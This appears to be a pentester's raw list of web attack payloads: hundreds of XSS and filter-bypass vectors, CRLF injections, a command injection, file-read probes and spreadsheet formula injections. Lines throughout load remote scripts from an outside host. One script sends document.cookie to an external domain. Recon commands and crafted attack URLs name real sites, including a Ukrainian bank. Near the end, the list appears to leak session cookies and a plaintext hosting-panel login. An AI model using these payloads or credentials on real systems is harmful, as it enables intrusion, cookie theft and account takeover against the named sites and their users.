"><img src=x onerror=prompt(1)>qw{{2+2}}qw
"><img src=x onerror=prompt(1)>qw{{2+2}}qw"><script>alert()</script>
<script>alert('xss')</script>
"><script>alert(/xss/)</script>
"><script>alert(/xss/)</script>
"><script>alert(document.cookie)</script>
<iframe src="https://securityz.net" width="100%" height="300">
<iframe src="https://securityz.net/iu.html" width="100%" height="300"></iframe>
"><script>alert(document.cookie)</script>
<FRAMESET><FRAME SRC="javascript:alert(1);"></FRAMESET>
<TABLE BACKGROUND="javascript:alert(1)">
<TABLE><TD BACKGROUND="javascript:alert(1)">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<BASE HREF="javascript:alert('XSS');//">
Browser version
<!--[if gte IE 4]>
<SCRIPT>alert('XSS');</SCRIPT>
<![endif]-->
Inside .SWF XSS
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
<OBJECT TYPE="text/x-scriptlet" DATA="https://securityz.net/index.html"></OBJECT>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<SCRIPT a=">" SRC="https://securityz.net/xss.js"></SCRIPT>
<SCRIPT =">" SRC="https://securityz.net/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="https://securityz.net/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="https://securityz.net/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="https://securityz.net/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="https://securityz.net/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="https://securityz.net/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="https://securityz.net/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
<A HREF="http://1113982867/">XSS</A>
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<A HREF="http://66.000146.0x7.147/">XSS</A>
<A HREF="//www.google.com/">XSS</A>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<svg><x><script>alert(1)</x>
<svg><x><script>alert('1')</x>
<svg onload=window.onerror=alert;throw/1/;//"/>
<img src=x onerror=while(true){prompt(1)}>
<iframe src=""/srcdoc='<svg onload=alert(1)>'>
<!--<img src="--><img src=x onerror=alert(1)//">
<svg id=javascript:alert(1) onload=location=id>
<svg id=alert(1) onload=eval(id)>
<img src=x:alert(alt) onerror=eval(src) alt=xwx>
<body/onpageshow=(alert)(1)>
<svg id=alert(1) onload=eval(id)>
<svg onload=(alert)(1) >
"><frameset onload=alert(1)>
/*To bypass input values*/
"autofocus/onfocus="alert (/1)
onfocus=onfocus=\u0061lert(1) autofocus
autofocus onfocus=window.onerror=alert;throw/1/;//
xxxx'"<img src=1 onerror=alert() a
<<script>script<script>>alert(/xss/);</script%20>
javascript:alert(/hello world/);//
javascript%3aalert%28%2fhello+world%2f%29%3b%2f%2f
group_name');alert(document.cookie);//
</title></script/"-alert(0)-"-->"><svg/onload
%3C/title%3E%3C/script/%22-alert%280%29-%22--%3E%22%3E%3Csvg/onload=prompt%28document.domain%29%3E
/*Bypass filtration "script/alert"*/
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)>
<script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script>
<script>alert(document.cookie)</script>">
<img/id="confirm(1)"/alt="/"src="/"onerror=eval(id)>'">
<img src="http://www.shellypalmer.com/wp-content/images/2015/07/hacked-compressor.jpg">
<script>$=1,alert($)</script>
<script ~~~>confirm(1)</script ~~~>
<script>$=1,\u0061lert($)</script>
<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>
<</script/script><script ~~~>\u0061lert(1)</script ~~~>
</style></scRipt><scRipt>alert(1)</scRipt>
<mArquee%20onStart%3D[~[onmouseleave(([[(alert(1))]]))]]%20]
<svg><script /* /*/*/*>\u0061l\u0065rt`X`</x+x
OR
<svg><script booogus>\u0061l\u0065rt`X`</script>
OR
<svg><script /* /*/*/*>\u0061l\u0065rt`X`<
<img ismap='xxx' itemtype='yyy style=width:100%;height:100%;position:fixed;left:0px;top:0px; onmouseover=alert(/XSS/)//'>
<link rel=import href=https:securityz.net/test.swf
/*tougher policy on the html tags*/
<h1 onmouseover=alert(1)>xwx
<h1/onmouseover='\u0061lert(1)'>xwx
<marquee/onstart=alert(1)>xwx
<div/onmouseover='alert(1)'>xwx
<h1/onmouseover='alert(1)'>xwx
<h1 onmouseover='alert(1)'>xwx
<p onmouseover='alert(1)'>xwx
<p/onmouseover='alert(1)'>xwx
<plaintext/onmouseover=prompt(1)>
/*Classic very popular vector*/
<script>alert(1)</script>
</script><img src=x onerror=alert(1);>
</script><iframe/onload=alert(1)>
<img src=x onerror=alert(1);>
<style ONLOAD=prompt(1)>
<iframe/onload=alert(1)>
<svg/onload=prompt(1)>
<svg onload=alert(1)>
"style=background:black; onmouseover=alert(1)"
"autofocus/onfocus="alert(1)
"onmouseover="alert(1);"
"/onmouseover= alert(1)>
"onload="alert(1)""
/*HTML5 popular vectors*/
<video/poster/onerror=alert(1)>
<video><source onerror="javascript:alert(1)">
<video onerror="javascript:alert(1)"><source>
<audio onerror="javascript:alert(1)"><source>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<form><button formaction="javascript:alert(1)">
/*data:text*/
data:text/plain,alert('xwx')
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
/*Bonus Dom Based Xss wector for popular WordPress plugin Prettyphoto*/
#!prettyPhoto/2,<a onclick="alert(1);">/ /*firefox*/
#prettyPhoto[gallery]/1,<a onclick="alert(1);">/ /*firefox*/
#prettyPhoto[rmsg0d]/2,<img src=x onerror=alert(1)>/ /*firefox*/
#prettyphoto[pp_gal]/2,<img src=1 onerror=alert(1)> /*Only Google chrome*/
</div></article>"><script src=https://securityz.net/xss.js></script>
<div id="form_purpose" class="info_panel purpose"><div class="box"><div
<SCRIPT SRC="https://security.net/xss.jpg"></SCRIPT>
<SCRIPT SRC=//securityz.net/t.j>
"><script src=https://securityz.net/t.js></script></script>
<meta http-equiv="refresh" content="1;URL=https://securityz.net?moyo=4" />
<meta refresh="0;https://securityz.net/">
*/--></script></title></textarea></noscript></style></xmp></noembed></comment></xml></iframe><script src=https://securityz.net/moyo.js></script></script>
&t;<script src=http://securityz.net/xss.js4567></script>&t;
<<script src=//47;/vk.co/#47;><&#></script>gt;
<<script src=//kkkkkkkkvk.co/kkkkkkkkkkkktkkk></script>;
"<gtt<script>alert(1)</script>gttltuuuu;
<<script src=https://kkvk.co/kkkkkkkkkkkkt.js></script>;
javascript:alert(1)
qt=';alеrt();var a = '
'),alert('1234
\"</script><script>alert(1);<!--
%22);alert(1);<!--
[[a|""onload="alert(1)"]]
[[a|http://onload='alert(1)']]
Comment#--><script>alert(1)</script>
'#';alert(1)//
");([]['\163\157\162\164']['\143\157\156\163\164\162\165\143\164\157\162'])('\141\154\145\162\164(1)')()//
<img src='1231231' onerror='alert("hacked")'/>
");confirm("1
\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex
"><plaintext/onmouseover=prompt(1)>
<x~%0Aonmouseover=alert(1)>hek (IE)
'><script>alert(document.cookie)</script>
<script>alert(1)</script>
"><b><h1><i><s>hello
"></script><iframe/onload=alert(1)>
"--></style></scRipt><scRipt>alert(String.fromCharCode(72, 101, 108, 108, 111, 32, 88, 115, 115))</scRipt>
/*-->]]>%>?></object></script></title></textarea></noscript></style></xmp><img src=1 onerror=alert(1)>'
"></textarea><script>alert(/XSS/)</script>
"><img src=1 onerror=alert(1);>
/*-->]]>%>?></object></script></title></textarea></noscript></style></xmp><img src=1 onerror=alert(1)>'
/../../../etc/passwd%)
<a href="<script>alert('1')</script>" title="test">
<script>prompt(2)</script>
"/src='http://securityz.net/evil.js'"
/?aaaa=111111111&=&#bb"><img src=1 onerror=alert(document.domain);>bbb=222222222
#<img src=x onerror=alert(0)>
<a onclick="alert(1);">/
<a onclick="alert(1);">
#data:text/plain,alert(1)
тестирование на проникновение
тест на проникновение цена
сканер уязвимостей сайта онлайн
сканер уязвимостей сайта
проверка уязвимостей сайта
проверка сайта на вирусы онлайн
пентест сайта
пентест
обеспечение информационной безопасности
информационная безопасность и защита информации
информационная безопасность
иб
аудит информационной безопасности
аудит безопасности сайта
аудит безопасности
/'-alert(1)-'
\";alert(1);//
'';!--"<xss>=&{()}
q=;//
"><p><img onerror="prompt(888)" src=x.jpg"/></p>
"><iframe/onload=alert(document.domain)>
"><img src=1 onerror=alert(888);>
#message=alert(0)
<p>qw{{2+2}}qw</p> <p>"><iframe/onload=alert(document.domain)><a title="http://"><iframe/onload=alert(document.domain)>" href="http://"><iframe/onload=alert(document.domain)>" target="_blank" rel="nofollow" rel="nofollow">"><iframe/onload=alert(document.domain)></a></p>
<IMG SRC="jav
ascript:alert(0);">
<IMG SRC="jav
ascript:alert(1);">
<IMG SRC="jav
ascript:alert(1);">
<IMG SRC="jav ascript:alert(1);">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:a&
#0000108ert('XSS')>
<IMG SRC=javascript:alert(
'XSS')>
<img src=x onerror="javascript:alert('XSS')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<IMG onmouseover="alert(1)">
<IMG SRC= onmouseover="alert(1)">
<IMG SRC=# onmouseover="alert(0)">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG """><SCRIPT>alert(1)</SCRIPT>">
<IMG SRC=`javascript:alert("ghghg, 'tt'")`>
<IMG SRC=javascript:alert("qwee")>
<IMG SRC=JaVaScRiPt:alert(1)>
<IMG SRC=javascript:alert(1)>
<IMG SRC="javascript:alert(1);">
"><script>alert(document.domain)</script>
"><img src=x onerror=prompt(1)>
"%3e%3cb%20onbeforescriptexecute=prompt(document.domain)%3e
"><img src=x onerror=prompt(1)>

%22%3e%3c%69%6d%67%20%73%72%63%3d%78%20%6f%6e%65%72%72%6f%72%3d%70%72%6f%6d%70%74%28%31%29%3e%71%77%7b%7b%32%2b%32%7d%7d%71%77
%25%32%32%25%33%65%25%33%63%25%36%39%25%36%64%25%36%37%25%32%30%25%37%33%25%37%32%25%36%33%25%33%64%25%37%38%25%32%30%25%36%66%25%36%65%25%36%35%25%37%32%25%37%32%25%36%66%25%37%32%25%33%64%25%37%30%25%37%32%25%36%66%25%36%64%25%37%30%25%37%34%25%32%38%25%33%31%25%32%39%25%33%65%25%37%31%25%37%37%25%37%62%25%37%62%25%33%32%25%32%62%25%33%32%25%37%64%25%37%64%25%37%31%25%37%37
test%0dSet-Cookie:crlf=injection;domain=.mail.ru;
«><script >alert(document.cookie)</script>
«><ScRiPt>alert(document.cookie)</ScRiPt>
«%3cscript%3ealert(document.cookie)%3c/script%3e
» onfocus=»alert(document.cookie)
<SCRIPT a=»>» SRC=»https://securityz.net/xss.js»></SCRIPT>
<script>window.onload = function() {var AllLinks=document.getElementsByTagName(«a»);
AllLinks[0].href = «http://badexample.com/malicious.exe»; }</script>
</script><svg+onload=alert(1)>
<script>prompt(2)</script>
"><img src=x onerror=prompt(document.domain)>
"><img src=x onerror=alert(1)>
"><img src=x onerror=prompt(1)>qw{{2+2}}qw
"><img src=x onerror=prompt(/OPENBUGBOUNTY/)>
</script>"><script src=https://securityz.net/1.js?></script>
\"-->'><img src=1 onerror="var script =document.createElement('script');script.src ='//securityz.net/1.js'; document.body.appendChild(script);">
"><svg/onload="var script =document.createElement('script');script.src ='//securityz.net/1.js'; document.body.appendChild(script);">
<meta http-equiv="refresh" content="1;URL=https://securityz.net/blind.html?puzzle-movies" />
"><img src="https://securityz.net/1.jpg">
/wp-includes/js/mediaelement/flashmediaelement.swf?jsinitfunctio%gn=confirm`1`
/wp-includes/js/plupload/plupload.flash.swf?target%g=alert&uid%g=XSS&
</script>"><script src=https://securityz.net/1.js?></script>
<meta http-equiv="refresh" content="1;URL=https://securityz.net/blind.html?puzzle-movies" />
<script src=//14.rs>
alert(dfdffd) data:text/html;base64,PHNjcmlwdD5wcm9tcHQoJ09QRU5CVUdCT1VOVFknKTwvc2NyaXB0Pg==#
=HYPERLINK("https://maliciousDomain.com/evil.html?data="&A1, "Click to view additional information")
=cmd|' /C calc'!A0
<IMG SRC=//securityz.net/lambo.png onerror="alert(String.fromCharCode(88,83,83))"></img>
'" /Autof<K>ocus /O<K>nfocus=confirm`1` /
'"</Script><Html Onmouseover=(alert)(1) //
1/"--!><Svg/Onload=confirm`1`>"
"><body onpageshow=alert`1`>
<!'/*"/*\'/*\"/*--></Script><Image SrcSet=K */; OnError=confirm`OPENBUGBOUNTY` //>
"></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)>
</script>"><script src=https://securityz.net/x.js?></script>
http://privatmarket-dev-2.test.it.loc/privatmarket/test_fotos.xml
iv id="form_purpose" class="info_panel purpose"><div class="box"><div
test'-)/9
python /root/sublist3r.py -v -d site.com
dirb https://site.com /usr/share/dirb/wordlists/big.txt
"><img src=1 onerror=alert('fuck');>
"><b><h1><i><s>hello
"><img src=1 onerror=alert(document.domain);>
<img ismap='xxx' itemtype='yyy style=width:100%;height:100%;position:fixed;left:0px;top:0px; onmouseover=alert(/XSS/)//'>
#!\;'prompt(document.domain);//
/%08/evil.com
$(sleep 20)
<a href="#" onClick="alert(document.domain)"><img title="Click me" /></a>
%0dSet-Cookie:xxx=xwx
%0aSet-Cookie:xxx=xwx
%0a%0d
&url=https:///XSSPosed:1 Cont ent-Type:text/html Content-Length:39 <script>alert('fuck')</scrip t>/
<meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh>
%22});});});prompt(document.domain);% 24('%23dynamicnav a').each(function(i){$(this).click(function(event){x({y:%22 😯
<meta http-equiv="refresh" content="1;URL=https://securityz.net" />
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<meta refresh="5;https://merchant.webmoney.ru/">
<script>document.location.href = 'https://securityz.net';</script>
https://pastebin.com/raw.php?i=15S5qZs0
http://set-cookie.ru/inject/google-inject.swf
?clickTAG=https://securityz.net
Flash vulnerability
?HtmlVariable=<a+href="javascript:alert(document.domain)">XSS!</a>
/FlashBanner.swf?username=<a+href="javascript:alert("XSS")
/FlashBanner.swf?clickTAG=javascript:alert(1)
/swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(1);//
/swf?userinput1=javascript:alert(1)
/swf?js=alert(document.domain);
getURL("javascript:alert('Hacked by me!')")
?link1=javascript:alert(document.domain)
?displayclick=link&link=data:text/html;base64,Ij48L3NjcmlwdD48aWZyYW1lL29ubG9hZD1hbGVydChkb2N1bWVudC5kb21haW4pPg==&file=1.jpg
-----------------------------------------------------------
http://deb.mirohost.net/
http://mirror.mirohost.net/backports/
https://privatbank.ua/ua/business/sistema-online-obuchenija/
https://keysa.ru/feedback/?fields=&name=%3Cimg+src%3D%271231231%27+onerror%3D%27alert%28%22hacked%22%29%27%2F%3E++++%22%29%3Bconfirm%28%221+%5C%3E%3Cplaintext%2Fonmouseover%3Dprompt%281%29%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E%40gmail.com%3Cisindex+%22%3E%3Cplaintext%2Fonmouseover%3Dprompt%281%29%3E+%27%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=%3Cimg+src%3D%271231231%27+onerror%3D%27alert%28%22hacked%22%29%27%2F%3E++++%22%29%3Bconfirm%28%221+%5C%3E%3Cplaintext%2Fonmouseover%3Dprompt%281%29%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E%40gmail.com%3Cisindex+%22%3E%3Cplaintext%2Fonmouseover%3Dprompt%281%29%3E+%27%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&text=%3Cimg+src%3D%271231231%27+onerror%3D%27alert%28%22hacked%22%29%27%2F%3E%0D%0A%0D%0A%0D%0A%0D%0A%22%29%3Bconfirm%28%221%0D%0A%5C%3E%3Cplaintext%2Fonmouseover%3Dprompt%281%29%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E%40gmail.com%3Cisindex%0D%0A%22%3E%3Cplaintext%2Fonmouseover%3Dprompt%281%29%3E%0D%0A%27%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&err=1
alert(dfdffd) data:text/html;base64,PHNjcmlwdD5wcm9tcHQoJ09QRU5CVUdCT1VOVFknKTwvc2NyaXB0Pg==#
document.domain data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+
https://www.privat24.ua/?srvc_id=vsrvs3&go=%2Fp24api%2Fishop%3Fpid%3D18366508%26mid%3D49#login
file:///etc/passwd
-u "https://topvisor.ru/project/keywords/322661/" --data="text=1&action=." --cookie="__utma=87358877.98777352.1434625937.1438446709.1438457925.6; __utmb=87358877.6.10.1438457925; __utmc=87358877; __utmt=1; __utmz=87358877.1434625937.1.1.utmcsr=serprating.ru|utmccn=(referral)|utmcmd=referral|utmcct=/adding.html; auth=43992_4b6538a44a1dfdc2b83477cd76dee98ee0e6518d2cac6a5b1fa6b05498a5e7be; topvisor=1jqup3b1r75g83ngia11rmn376"
https://bitte-hosting.com/manager/billmgr?func=auth&checkcookie=no&username=qiecesmg7j&password=uALhby72cPeV0wJ
1c.pb.ua/?cmd=lookup&openid.auth.check=true
nmap -sU -sV -p 53 -Pn --script dns-recursion privatbank.ua
gopher://etc/passwd
file:///etc/passwd
https://my.prom.ua/cabinet/util/sign_auth_user?hash=InFpZWNlQGJrLnJ1Ig.CZ9W3Q.34LO0mMH2PLtHCzF4GzDvro6CYQ&next=http://securityz.net/
<script src='http://securityz.net/evil.js'></script> evil.js EVIL.JS
python /root/sublist3r.py -v -d pb.ua
<script src="http://securityz.net/xss.js">
<script>img = new Image(); img.src = "http://zuttu.ru/images/qiece_1.gif?"+document.cookie;</script>
<img src="https://securityz.net/lambo.png?">
javascript:document.write('<script>img = new Image(); img.src = "http://zuttu.ru/images/qiece_1.gif?"+document.cookie;</script>')
<figcaption class="wp-caption-text"><a href="</figcaption></figure></a><a href=" onClick='alert(1)' "></a>
/wp-includes/js/plupload/plupload.flash.swf?target%g=alert&uid%g=XSS&
/wp-includes/js/mediaelement/flashmediaelement.swf?jsinitfunctio%gn=confirm`1`
<script src='https://securityz.net/t.js'></script>
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20O\
2 K%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2\
3 019%0d%0a%0d%0a<html>deface</html>
http://yandex.ru%00aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
"><script src=https://securityz.net/1.js?></script></script>
"><svg/onload="var script =document.createElement('script');script.src ='//securityz.net/1.js'; document.body.appendChild(script);">
<meta http-equiv="refresh" content="1;URL=https://securityz.net?site1" />
<img src="https://securityz.net/lambo.png?site1">